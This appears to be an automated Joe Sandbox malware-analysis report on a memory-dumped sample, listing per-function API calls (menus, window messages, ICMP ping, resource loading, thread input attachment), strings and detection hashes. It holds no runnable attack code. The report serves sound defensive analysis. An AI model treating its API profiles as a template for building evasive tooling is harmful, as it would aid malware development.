Opcode ID: 2a9bb503206f41f65850bad66e89e54a565ac8be3686fcc7d43a03a9b64ea242
Instruction ID: 55fe3fd519c1690bb15eba02c1de156308112efa4a6540c42d77d7f81311bf64
Opcode Fuzzy Hash: 2a9bb503206f41f65850bad66e89e54a565ac8be3686fcc7d43a03a9b64ea242
Instruction Fuzzy Hash: 6051BC301287019FC722EF14C8D1AAAB7A9EF85300F10482EF4C69B6A2DB31DD59CB53

Function 002D9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 002D99C2
__swprintf.LIBCMT ref: 002D9A0C
__i64tow.LIBCMT ref: 0030FA0F

Strings

%.15g, xrefs: 002D9A06
True, xrefs: 0030F9D0
False, xrefs: 0030F9D7
0x%p, xrefs: 0030F9F1

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 7e3283794c8a6966cb759e23e5dd01eadd985156036c26f0f6d0d8b8b173833e
Instruction ID: 0bc0a8102ce618a468ef3335f4721d0ad113f65c6bc370acb7b0675e14b74b59
Opcode Fuzzy Hash: 7e3283794c8a6966cb759e23e5dd01eadd985156036c26f0f6d0d8b8b173833e
Instruction Fuzzy Hash: D441E171624209AFDB35EF28D852EB6B3E8EB04300F20446FF649D7791EA719D51CB11

Function 003573C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003573D9
CreateMenu.USER32 ref: 003573F4
SetMenu.USER32(?,00000000), ref: 00357403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00357490
IsMenu.USER32(?), ref: 003574A6
CreatePopupMenu.USER32 ref: 003574B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003574DD
DrawMenuBar.USER32 ref: 003574E5

Strings

F, xrefs: 003574D1
0, xrefs: 003573CF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 8e174ac49082f9e595453b7a5c3532c2673ba14bf8aa6a45e86a614bbf64e4ec
Instruction ID: 58b8f29e2ba6ef7ede6cdd5339a776f3adf8408ebeb7d345472e32a09d4dd135
Opcode Fuzzy Hash: 8e174ac49082f9e595453b7a5c3532c2673ba14bf8aa6a45e86a614bbf64e4ec
Instruction Fuzzy Hash: 124168B4A01249EFDB12DF66E884EAABBB9FF09342F150429ED0597360D731A914CF50

Function 0035772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003577CD
CreateCompatibleDC.GDI32(00000000), ref: 003577D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003577E7
SelectObject.GDI32(00000000,00000000), ref: 003577EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 003577FA
DeleteDC.GDI32(00000000), ref: 00357803
GetWindowLongW.USER32(?,000000EC), ref: 0035780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00357821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0035782D

Strings

static, xrefs: 00357765

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 7deb154f00f7223c3f5765fdf0ab51da4381b8a83be91bab9da2b38a37cdf840
Instruction ID: de8ab7a6b30585e52ef7b1cd149d16e958b4dfd0782b985525f5eae9417e79de
Opcode Fuzzy Hash: 7deb154f00f7223c3f5765fdf0ab51da4381b8a83be91bab9da2b38a37cdf840
Instruction Fuzzy Hash: 13315832105215AFDB139FA5EC09FEA3B6DEF0D326F110225FA15A61B0D731D825DBA4

Function 002F7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002F707B

Part of subcall function 002F8D68: __getptd_noexit.LIBCMT ref: 002F8D68

__gmtime64_s.LIBCMT ref: 002F7114
__gmtime64_s.LIBCMT ref: 002F714A
__gmtime64_s.LIBCMT ref: 002F7167
__allrem.LIBCMT ref: 002F71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F71D9
__allrem.LIBCMT ref: 002F71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F720E
__allrem.LIBCMT ref: 002F7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F7243
__invoke_watson.LIBCMT ref: 002F72B4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 7a500b18909bc36f2245f7371efdeeae1358936680df134d41cb4ddd8699f6c6
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 1971FE71A1571BABE7149E79CC5177AF3A8AF107A0F14423AFA14D72C1EB70DE608B90

Function 00332A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00332A31
GetMenuItemInfoW.USER32(00396890,000000FF,00000000,00000030), ref: 00332A92
SetMenuItemInfoW.USER32(00396890,00000004,00000000,00000030), ref: 00332AC8
Sleep.KERNEL32(000001F4), ref: 00332ADA
GetMenuItemCount.USER32(?), ref: 00332B1E
GetMenuItemID.USER32(?,00000000), ref: 00332B3A
GetMenuItemID.USER32(?,-00000001), ref: 00332B64
GetMenuItemID.USER32(?,?), ref: 00332BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00332BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332C24

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: c0a22672f088f9bf19b0b828927859223621da7bd285f03d6f0781112dd02ea5
Instruction ID: b1396755a8544d4ce5f0d7a412a259fdf9b42daa43e49d48ce2b1135f4f1777c
Opcode Fuzzy Hash: c0a22672f088f9bf19b0b828927859223621da7bd285f03d6f0781112dd02ea5
Instruction Fuzzy Hash: 75617CB0900249AFDB23CF64D8C8EBFBBBCEB45345F150569E841A7261EB31AD45DB21

Function 00357192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00357214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00357217
GetWindowLongW.USER32(?,000000F0), ref: 0035723B
_memset.LIBCMT ref: 0035724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0035725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003572D6

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 84f1ea0450d8c9ce8f09650d723cde85d8a96ef42a3aea8faec6df2d4121c3fc
Instruction ID: 99cedb77dff68c2542317876c0418a97c96218336f9e36dbdc6183b7690e9039
Opcode Fuzzy Hash: 84f1ea0450d8c9ce8f09650d723cde85d8a96ef42a3aea8faec6df2d4121c3fc
Instruction Fuzzy Hash: 51618B75904208AFDB12DFA4CC81EEE77F8EB09710F10015AFE15AB2A1C770AE45DBA0

Function 0032710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00327135
SafeArrayAllocData.OLEAUT32(?), ref: 0032718E
VariantInit.OLEAUT32(?), ref: 003271A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 003271C0
VariantCopy.OLEAUT32(?,?), ref: 00327213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00327227
VariantClear.OLEAUT32(?), ref: 0032723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00327249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00327252
VariantClear.OLEAUT32(?), ref: 00327264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0032726F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 0f3dbc1daaeac0f843e681ef940b2ac2320f5374db6d9c5e1c2767e75cf14d42
Instruction ID: af34309be0d02f0ab3d1dea3c786140a96f66c85b789de058dbdb10f05e70bd7
Opcode Fuzzy Hash: 0f3dbc1daaeac0f843e681ef940b2ac2320f5374db6d9c5e1c2767e75cf14d42
Instruction Fuzzy Hash: 38414D75A00229EFCF01EF65D8449AEBBB8FF08355F008469F955A7261CB30A945CF90

Function 00345A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00345AA6
inet_addr.WS2_32(?), ref: 00345AEB
gethostbyname.WS2_32(?), ref: 00345AF7
IcmpCreateFile.IPHLPAPI ref: 00345B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00345B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00345B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00345C00
WSACleanup.WS2_32 ref: 00345C06

Strings

Ping, xrefs: 00345B29

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 264434a9e2b3435bb2d4eb901e68e0108bef458ff02f7aa78d8423242cb1d10c
Instruction ID: c9371bd142af5a221ad9a87f8089101508e36270f87464204eaf19e0814111ca
Opcode Fuzzy Hash: 264434a9e2b3435bb2d4eb901e68e0108bef458ff02f7aa78d8423242cb1d10c
Instruction Fuzzy Hash: C1518031A14B109FD712AF24CC85B2ABBE4EF48710F15896AF556DB2A2DB70ED40CF41

Function 0033B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0033B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0033B7B1
GetLastError.KERNEL32 ref: 0033B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 0033B828

Strings

NOTREADY, xrefs: 0033B7E7
UNKNOWN, xrefs: 0033B7E0
READONLY, xrefs: 0033B7F3
READY, xrefs: 0033B801
INVALID, xrefs: 0033B7FA

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: bdd891556520d24f46b75f07ff61dd4f2b464f60b8168fd32843420a4968161d
Instruction ID: c9755279a832c4348727df081f7b98f27ced5afdd5495a42c83592b6cab85d57
Opcode Fuzzy Hash: bdd891556520d24f46b75f07ff61dd4f2b464f60b8168fd32843420a4968161d
Instruction Fuzzy Hash: 8A319235A00705AFDB02EF64C8C5AEEBBB8EF44700F11416AF601DB2A1DB759E42CB51

Function 00329471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 0032B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0032B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003294F6
GetDlgCtrlID.USER32 ref: 00329501
GetParent.USER32 ref: 0032951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00329520
GetDlgCtrlID.USER32(?), ref: 00329529
GetParent.USER32(?), ref: 00329545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00329548

Strings

ListBox, xrefs: 003294B3
ComboBox, xrefs: 0032947E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: c5d2f18ca652b21fa0d6e334702a4c20dbaf42f9013043b34cabd81681b5bb3f
Instruction ID: 0e001f0b50b0a1deb7d7bd035b72aedc8c9af27901265a00afec3925b1c9ce95
Opcode Fuzzy Hash: c5d2f18ca652b21fa0d6e334702a4c20dbaf42f9013043b34cabd81681b5bb3f
Instruction Fuzzy Hash: 9421D370A00214BFCF06AB64DC85EFEBBB8EF49300F10416AF961972E2DB755919DB20

Function 0032955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 0032B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0032B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003295DF
GetDlgCtrlID.USER32 ref: 003295EA
GetParent.USER32 ref: 00329606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00329609
GetDlgCtrlID.USER32(?), ref: 00329612
GetParent.USER32(?), ref: 0032962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00329631

Strings

ListBox, xrefs: 0032959E
ComboBox, xrefs: 00329569

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: eeedcc0f4396b9713fe01bd37e007b740de7fca79d79e58fba30e8faf134f052
Instruction ID: 77f8b9dd9e4d44aafc7c3555fb46fd3d1f8ea1d55492061ba1b0e68b7e9b1e46
Opcode Fuzzy Hash: eeedcc0f4396b9713fe01bd37e007b740de7fca79d79e58fba30e8faf134f052
Instruction Fuzzy Hash: 28219274A00214BFDF06AB60DC85FFEBBB8EF49300F144166F961972A1DB759929DB20

Function 00329645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00329651
GetClassNameW.USER32(00000000,?,00000100), ref: 00329666
_wcscmp.LIBCMT ref: 00329678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003296F3

Strings

details, xrefs: 003296A1
list, xrefs: 003296D5
largeicons, xrefs: 00329687
smallicons, xrefs: 003296BB
SHELLDLL_DefView, xrefs: 00329672

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 3bad46430cea8051f9ba11e178b31c30572ca8a4c7eb4d16b180260c1886dd66
Instruction ID: d7a0e2c1ab26541d6786b2279dced7e12da94daff0c1f9a3e804b9067fcfe81f
Opcode Fuzzy Hash: 3bad46430cea8051f9ba11e178b31c30572ca8a4c7eb4d16b180260c1886dd66
Instruction Fuzzy Hash: DF11A77624832BBAEA036620EC16FF7B7DC9B05770F200067FA05A54E1FE5159514A98

Function 00334189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0033419D
__swprintf.LIBCMT ref: 003341AA

Part of subcall function 002F38D8: __woutput_l.LIBCMT ref: 002F3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 003341D4
LoadResource.KERNEL32(?,00000000), ref: 003341E0
LockResource.KERNEL32(00000000), ref: 003341ED
FindResourceW.KERNEL32(?,?,00000003), ref: 0033420D
LoadResource.KERNEL32(?,00000000), ref: 0033421F
SizeofResource.KERNEL32(?,00000000), ref: 0033422E
LockResource.KERNEL32(?), ref: 0033423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0033429B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 73b7c205b0a3b2368f8ba1bae7458f13efdb61bb7b7fd2e51bfa63ccffc2e986
Instruction ID: efbf59d481993468aa434e1a235e52f998363255ace6561611790bcda406183a
Opcode Fuzzy Hash: 73b7c205b0a3b2368f8ba1bae7458f13efdb61bb7b7fd2e51bfa63ccffc2e986
Instruction Fuzzy Hash: EF31D4B5A0520AAFDB029F60DC88EBF7BACEF05342F014925F905E2150D734E951CBA0

Function 003316DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00331700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00330778,?,00000001), ref: 00331714
GetWindowThreadProcessId.USER32(00000000), ref: 0033171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330778,?,00000001), ref: 0033172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0033173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330778,?,00000001), ref: 00331755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00330778,?,00000001), ref: 00331767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00330778,?,00000001), ref: 003317AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00330778,?,00000001), ref: 003317C1
